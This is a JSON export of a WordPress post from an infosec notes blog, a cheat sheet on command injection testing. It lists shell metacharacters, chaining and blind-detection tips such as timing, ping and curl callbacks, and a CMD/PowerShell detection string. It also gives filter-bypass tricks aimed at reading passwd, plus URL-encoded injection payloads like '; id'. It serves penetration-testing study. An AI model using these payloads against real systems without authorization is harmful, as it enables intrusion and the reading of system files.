{"id":1483,"date":"2020-05-13T10:17:25","date_gmt":"2020-05-13T08:17:25","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1483"},"modified":"2024-06-24T09:47:30","modified_gmt":"2024-06-24T07:47:30","slug":"command-injections","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1483","title":{"rendered":"Command injections"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1011\">See also the encod\u00ading post for encod\u00ading methods.<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Try to deter\u00admine which char\u00adac\u00adters are allowed by adding them one by one.\n<pre>\"\n'\n;\n&amp;\n|\n&gt;\n`\n\\\n(\n)\n#\n{\n}\n[\n]<\/pre>\n<\/li>\n\n\n\n<li>Try the fol\u00adlow\u00ading to add mul\u00adti\u00adple com\u00admands to one bash com\u00admand. <pre>|<br>&amp;<br>&gt;<br>;<\/pre><\/li>\n\n\n\n<li>Espe\u00adcial\u00adly for <span class=\"caps\">XSS<\/span>, try these:<br><code>'<br>\"<br>{<br>}<br>;<br>&lt;<br>&gt;<\/code><\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Tips<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Try to redi\u00adrect <span class=\"caps\">STDERR<\/span> to see what goes&nbsp;wrong.<\/li>\n\n\n\n<li>If only one com\u00admand is pos\u00adsi\u00adble, try to add <span class=\"amp\">&amp;<\/span><span class=\"amp\">&amp;<\/span> or || \u2026 to add anoth\u00ader command.<\/li>\n\n\n\n<li>If unsure if injec\u00adtion works and no out\u00adput is there, try <strong>side chan\u00adnels<\/strong>:\n<ul class=\"wp-block-list\">\n<li>Tim\u00ading: Try some\u00adthing like wait and see if the response is delayed accordingly.<\/li>\n\n\n\n<li><span class=\"caps\">ICMP<\/span>: Try ping your\u00adself and cap\u00adture <span class=\"caps\">ICMP<\/span> pack\u00adets with tcpdump.<\/li>\n\n\n\n<li>Curl\/wget: Open a lis\u00adten\u00ader and try to request some\u00adthing from yourself.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>If you can inject on win\u00addows and want to know, weath\u00ader the <span class=\"caps\">CMD<\/span> or <span class=\"caps\">PS<\/span> is used, try to inject this:<br><code>(dir 2&gt;&amp;1 *`|echo CMD);&amp;&lt;# rem #&gt;echo PowerShell<\/code><br>Or, in URLen\u00adcode:<br><code>(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell<\/code><\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Bypassing filters<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Use uninialial\u00adized vari\u00adables. Langes like <span class=\"caps\">PHP<\/span> return emp\u00adty string in string con\u00adtexts.\n<pre>pa$isswd<\/pre>\n<\/li>\n\n\n\n<li>Add emp\u00adty strings\n<pre>pa\"\"sswd<\/pre>\n<\/li>\n\n\n\n<li>Add com\u00adments (for the right lan\u00adguage!) like\n<pre>pa\/**\/sswd<\/pre>\n<\/li>\n\n\n\n<li>Ressources\n<ul class=\"wp-block-list\">\n<li>https:\/\/www.exploit-db.com\/papers\/17934<\/li>\n\n\n\n<li>&nbsp;<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Linux \/&nbsp;<span class=\"caps\">PHP<\/span><\/h1>\n\n\n\n<p class=\"wp-block-paragraph\"><em>All <span class=\"caps\">URL<\/span> encod\u00aded val\u00adues start\u00ading with a space character.<\/em><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">| id\n%20%7c%20%69%64\n\n|| id\n%20%7c%7c%20%69%64\n\n&amp; id\n%20%26%20%69%64\n\n&amp;&amp; id\n%20%26%26%20%69%64\n\n&lt;?php print \"1\"\" ?&gt;\n%20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e\n\n;id\n%20%3b%69%64<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Sources<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>https:\/\/github.com\/xsscx\/Commodity-Injection-Signatures <\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>See also the encod\u00ading post for encod\u00ading meth\u00adods. Tips Bypass\u00ading fil\u00adters Lin\u00adux \/&nbsp;<span class=\"caps\">PHP<\/span> All <span class=\"caps\">URL<\/span> encod\u00aded val\u00adues start\u00ading with a space char\u00adac\u00adter. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 <span class=\"amp\">&amp;<\/span> id %20%26%20%69%64 <span class=\"amp\">&amp;<\/span><span class=\"amp\">&amp;<\/span> id %20%26%26%20%69%64 &lt;?php print \u201c1\u201d\u201d ?&gt; %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[269,143],"class_list":["post-1483","post","type-post","status-publish","format-standard","hentry","category-general","tag-command-injection","tag-php"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1483"}],"version-history":[{"count":15,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1483\/revisions"}],"predecessor-version":[{"id":3955,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1483\/revisions\/3955"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}